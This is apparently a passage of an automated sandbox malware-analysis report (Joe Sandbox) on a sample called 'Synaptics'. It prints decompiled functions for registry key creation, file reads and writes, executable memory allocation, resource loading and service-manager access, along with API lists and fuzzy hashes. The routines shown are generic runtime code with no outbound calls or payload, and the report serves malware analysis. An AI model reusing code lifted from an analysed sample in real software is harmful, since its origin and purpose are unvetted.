                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID: Excel.Application
                                                                                                                                                                                          • API String ID: 3341692771-3141931764
                                                                                                                                                                                          • Opcode ID: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                          • Instruction ID: 5a7791121ba19d98e3bcb4b8c02d80bfc0818dc7363a01a43232f673b92e6833
                                                                                                                                                                                          • Opcode Fuzzy Hash: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                          • Instruction Fuzzy Hash: D4E0E530704B087BD701EB62DC52E8E77ECDB4A714BA248BAF400E2642DE3C9E0094A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00431EF8 Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E00431EF8(void* __eax, void* __ebx, char __ecx, void* __edx, void* __esi) {
				char _v5;
				char _v6;
				void* _v12;
				char _v16;
				int _v20;
				char* _t40;
				signed int _t43;
				char* _t55;
				signed char _t63;
				intOrPtr _t72;
				void* _t78;
				void* _t81;

				_v16 = 0;
				_v5 = __ecx;
				_t78 = __eax;
				_push(_t81);
				_push(0x431ffd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t81 + 0xfffffff0;
				E00404A58( &_v16, __edx);
				_t63 = E00431D88(_v16);
				if(_t63 == 0) {
					E00404F20( &_v16, 1, 1);
				}
				_v12 = 0;
				if(_v5 == 0 || _v16 == 0) {
					_t40 = E00404E80(_v16);
					_t43 = RegOpenKeyExA(E00431EE4(_t78, _t63), _t40, 0,  *(_t78 + 0x18),  &_v12); // executed
					_v6 = _t43 == 0;
				} else {
					_t55 = E00404E80(_v16);
					_t43 = RegCreateKeyExA(E00431EE4(_t78, _t63), _t55, 0, 0, 0,  *(_t78 + 0x18), 0,  &_v12,  &_v20);
					_v6 = _t43 == 0;
				}
				if(_v6 != 0) {
					if(((_t43 & 0xffffff00 |  *((intOrPtr*)(_t78 + 4)) != 0x00000000) & _t63) != 0) {
						_push( *((intOrPtr*)(_t78 + 0x10)));
						_push(E00432018);
						_push(_v16);
						E00404D40();
					}
					E00431EC0(_t78, _v16, _v12);
				}
				_pop(_t72);
				 *[fs:eax] = _t72;
				_push(E00432004);
				return E004049C0( &_v16);
			}















                                                                                                                                                                                          0x00431f02
                                                                                                                                                                                          0x00431f05
                                                                                                                                                                                          0x00431f0a
                                                                                                                                                                                          0x00431f0e
                                                                                                                                                                                          0x00431f0f
                                                                                                                                                                                          0x00431f14
                                                                                                                                                                                          0x00431f17
                                                                                                                                                                                          0x00431f1f
                                                                                                                                                                                          0x00431f2c
                                                                                                                                                                                          0x00431f30
                                                                                                                                                                                          0x00431f3f
                                                                                                                                                                                          0x00431f3f
                                                                                                                                                                                          0x00431f46
                                                                                                                                                                                          0x00431f4d
                                                                                                                                                                                          0x00431f62
                                                                                                                                                                                          0x00431f72
                                                                                                                                                                                          0x00431f79
                                                                                                                                                                                          0x00431f7f
                                                                                                                                                                                          0x00431f96
                                                                                                                                                                                          0x00431fa6
                                                                                                                                                                                          0x00431fad
                                                                                                                                                                                          0x00431fad
                                                                                                                                                                                          0x00431fb5
                                                                                                                                                                                          0x00431fc0
                                                                                                                                                                                          0x00431fc2
                                                                                                                                                                                          0x00431fc5
                                                                                                                                                                                          0x00431fca
                                                                                                                                                                                          0x00431fd5
                                                                                                                                                                                          0x00431fd5
                                                                                                                                                                                          0x00431fe2
                                                                                                                                                                                          0x00431fe2
                                                                                                                                                                                          0x00431fe9
                                                                                                                                                                                          0x00431fec
                                                                                                                                                                                          0x00431fef
                                                                                                                                                                                          0x00431ffc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00431FFD,?,?,00000001), ref: 00431F72
                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00431FFD,?,?,00000001), ref: 00431FA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 436179556-0
                                                                                                                                                                                          • Opcode ID: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                          • Instruction ID: b4c976e95b02fa110a8c934fabbdb83e4f1344f95f7529043488b7411d694942
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6317371A042087FDB11EBA5D842BDFB7B9EF48304F10857AF914E3291DB799E098758
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402FE0 Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402FE0(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t49;
				signed int _t58;

				_t58 = _t49;
				_t48 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E004028E4(0x67);
					_v8 = 0;
				} else {
					if(WriteFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t48 + 8);
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E004028E4(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E004028E4(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                                                                                                                                          0x00402fe7
                                                                                                                                                                                          0x00402feb
                                                                                                                                                                                          0x00402ff8
                                                                                                                                                                                          0x00403057
                                                                                                                                                                                          0x0040305e
                                                                                                                                                                                          0x00402ffa
                                                                                                                                                                                          0x0040300f
                                                                                                                                                                                          0x0040302a
                                                                                                                                                                                          0x00403032
                                                                                                                                                                                          0x00403041
                                                                                                                                                                                          0x00403046
                                                                                                                                                                                          0x0040304d
                                                                                                                                                                                          0x0040304d
                                                                                                                                                                                          0x00403034
                                                                                                                                                                                          0x0040303a
                                                                                                                                                                                          0x0040303a
                                                                                                                                                                                          0x00403011
                                                                                                                                                                                          0x00403016
                                                                                                                                                                                          0x0040301d
                                                                                                                                                                                          0x0040301d
                                                                                                                                                                                          0x0040300f
                                                                                                                                                                                          0x00403069

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?), ref: 0040300A
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?,?,00474E3F,00000000,00000000,00474E74), ref: 00403011
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                                          • Opcode ID: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                          • Instruction ID: dacf0affb31a298fea10ec7efa56baaddcddd91d2a84db1d45905dc1d19b3bb0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D113071A01108EFDB44DF69C940A9ABBECEF48311B108477A808F7285E674DE009765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00422BCC Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49e88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x49e888; // 0x670000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029DC(0x49b5c8, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
						 *0x49e88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49e888 = _t35;
				}
				_t25 =  *0x49e88c;
				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49e88c;
			}








                                                                                                                                                                                          0x00422bda
                                                                                                                                                                                          0x00422bea
                                                                                                                                                                                          0x00422bef
                                                                                                                                                                                          0x00422bf1
                                                                                                                                                                                          0x00422bf6
                                                                                                                                                                                          0x00422bf8
                                                                                                                                                                                          0x00422c05
                                                                                                                                                                                          0x00422c0f
                                                                                                                                                                                          0x00422c17
                                                                                                                                                                                          0x00422c1a
                                                                                                                                                                                          0x00422c1a
                                                                                                                                                                                          0x00422c1d
                                                                                                                                                                                          0x00422c1d
                                                                                                                                                                                          0x00422c20
                                                                                                                                                                                          0x00422c2a
                                                                                                                                                                                          0x00422c2f
                                                                                                                                                                                          0x00422c32
                                                                                                                                                                                          0x00422c34
                                                                                                                                                                                          0x00422c3b
                                                                                                                                                                                          0x00422c42
                                                                                                                                                                                          0x00422c42
                                                                                                                                                                                          0x00422c4a
                                                                                                                                                                                          0x00422c4f
                                                                                                                                                                                          0x00422c54
                                                                                                                                                                                          0x00422c5a
                                                                                                                                                                                          0x00422c61

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,0042F4BC,00000000,?,00422D23,?,00000001,00000000,00400000,00000000,00000000,00000000), ref: 00422BEA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: x,B
                                                                                                                                                                                          • API String ID: 4275171209-71347176
                                                                                                                                                                                          • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                          • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004770E4 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E004770E4(struct HINSTANCE__* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t11;
				struct HINSTANCE__* _t18;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t33;
				intOrPtr _t34;

				_t33 = _t34;
				_v8 = __edx;
				_t18 = __eax;
				E00404E70(_v8);
				_push(_t33);
				_push(0x47716d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t34;
				_push(_t33);
				_push(0x47713f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_t11 = FindResourceA(_t18, E00404E80(_v8), 0xa); // executed
				if(_t11 != 0) {
				}
				FreeResource(_t11);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00477174);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                          0x004770e5
                                                                                                                                                                                          0x004770eb
                                                                                                                                                                                          0x004770ee
                                                                                                                                                                                          0x004770f3
                                                                                                                                                                                          0x004770fa
                                                                                                                                                                                          0x004770fb
                                                                                                                                                                                          0x00477100
                                                                                                                                                                                          0x00477103
                                                                                                                                                                                          0x00477108
                                                                                                                                                                                          0x00477109
                                                                                                                                                                                          0x0047710e
                                                                                                                                                                                          0x00477111
                                                                                                                                                                                          0x00477120
                                                                                                                                                                                          0x00477127
                                                                                                                                                                                          0x00477127
                                                                                                                                                                                          0x00477130
                                                                                                                                                                                          0x00477137
                                                                                                                                                                                          0x0047713a
                                                                                                                                                                                          0x00477159
                                                                                                                                                                                          0x0047715c
                                                                                                                                                                                          0x0047715f
                                                                                                                                                                                          0x0047716c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(03FB0000,00000000,0000000A), ref: 00477120
                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,03FB0000,00000000,0000000A,00000000,0047713F,?,00000000,0047716D,?,?,?,00000000,?,?,00477797), ref: 00477130
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4097029671-0
                                                                                                                                                                                          • Opcode ID: 0c01369b216a310da091917a244a29a9752c01353792112fe50603e155f75cf0
                                                                                                                                                                                          • Instruction ID: b5a9f116c175effd3efc5149bc70a163ce5319076f253d6e9104eb7803ecd09d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c01369b216a310da091917a244a29a9752c01353792112fe50603e155f75cf0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C0126B030C200BEE7019B62DD62C6BB7ACE7857107E0847BF50492780D63C5D109168
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004738BC Relevance: 3.0, APIs: 2, Instructions: 38serviceCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E004738BC(char __eax, signed int __ebx) {
				char _v8;
				intOrPtr* _t11;
				void* _t14;
				intOrPtr _t25;
				intOrPtr _t28;

				_push(__ebx);
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t28);
				_push(0x473922);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				_t11 =  *0x49de34; // 0x49b0ec
				if( *_t11 == 2) {
					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
						CloseServiceHandle(_t14);
					}
				}
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(E00473929);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                          0x004738c0
                                                                                                                                                                                          0x004738c1
                                                                                                                                                                                          0x004738c7
                                                                                                                                                                                          0x004738ce
                                                                                                                                                                                          0x004738cf
                                                                                                                                                                                          0x004738d4
                                                                                                                                                                                          0x004738d7
                                                                                                                                                                                          0x004738da
                                                                                                                                                                                          0x004738e2
                                                                                                                                                                                          0x004738f8
                                                                                                                                                                                          0x00473904
                                                                                                                                                                                          0x00473907
                                                                                                                                                                                          0x00473907
                                                                                                                                                                                          0x00473904
                                                                                                                                                                                          0x0047390e
                                                                                                                                                                                          0x00473911
                                                                                                                                                                                          0x00473914
                                                                                                                                                                                          0x00473921

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922,?,022B2354,?,?,0049A443), ref: 004738F8
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922,?,022B2354,?,?,0049A443), ref: 00473907
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleManagerOpenService
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1199824460-0
                                                                                                                                                                                          • Opcode ID: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                          • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458384 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00458384(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x49befc;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x49e668; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045843C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                                                                                                                                          0x00458388
                                                                                                                                                                                          0x00458396
                                                                                                                                                                                          0x00458399
                                                                                                                                                                                          0x0045839e
                                                                                                                                                                                          0x004583a3
                                                                                                                                                                                          0x004583a6
                                                                                                                                                                                          0x004583b0
                                                                                                                                                                                          0x004583ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004583b2
                                                                                                                                                                                          0x004583b2
                                                                                                                                                                                          0x004583b2
                                                                                                                                                                                          0x004583b2
                                                                                                                                                                                          0x004583c0
                                                                                                                                                                                          0x004583cb
                                                                                                                                                                                          0x004583d0
                                                                                                                                                                                          0x004583d1
                                                                                                                                                                                          0x004583d4
                                                                                                                                                                                          0x004583dd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CursorLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3238433803-0
                                                                                                                                                                                          • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                          • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402CC2 Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402CC2(void** __eax) {
				int _t13;
				long _t15;

				__eax[4] = 0;
				__eax[3] = 0;
				_t13 = ReadFile( *__eax, __eax[5], __eax[2],  &(__eax[4]), 0); // executed
				if(_t13 != 0) {
					return 0;
				}
				_t15 = GetLastError();
				if(_t15 != 0x6d) {
					return _t15;
				} else {
					return 0;
				}
			}





                                                                                                                                                                                          0x00402cc9
                                                                                                                                                                                          0x00402cce
                                                                                                                                                                                          0x00402ce2
                                                                                                                                                                                          0x00402ce9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402cf9
                                                                                                                                                                                          0x00402ceb
                                                                                                                                                                                          0x00402cf3
                                                                                                                                                                                          0x00402cfc
                                                                                                                                                                                          0x00402cf5
                                                                                                                                                                                          0x00402cf8
                                                                                                                                                                                          0x00402cf8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402CE2
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402CEB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1948546556-0
                                                                                                                                                                                          • Opcode ID: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                          • Instruction ID: 4e4afa64d6ce4905370910369685084fd00da3edce78af6e671044812be54073
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2722b77db616b9ec834f1696af52551899f9073d62fedd3e8687356533fa5bef
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E075B16142005FEF80DEB989C0A5777DCAB08214B0448B6B908DA286E278D8509B25
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A90 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A90(void* __eax, long __edx) {
				int _t4;
				long _t7;

				_t7 = 0;
				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
				if(_t4 == 0) {
					_t7 = GetLastError();
				}
				return _t7;
			}





                                                                                                                                                                                          0x00409a97
                                                                                                                                                                                          0x00409aa2
                                                                                                                                                                                          0x00409aa9
                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                          0x00409ab0
                                                                                                                                                                                          0x00409ab7

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1799206407-0
                                                                                                                                                                                          • Opcode ID: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                          • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 675699e61b058174247cfbc6a9f31fc6273980f5e3cf600b71198e92341230a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
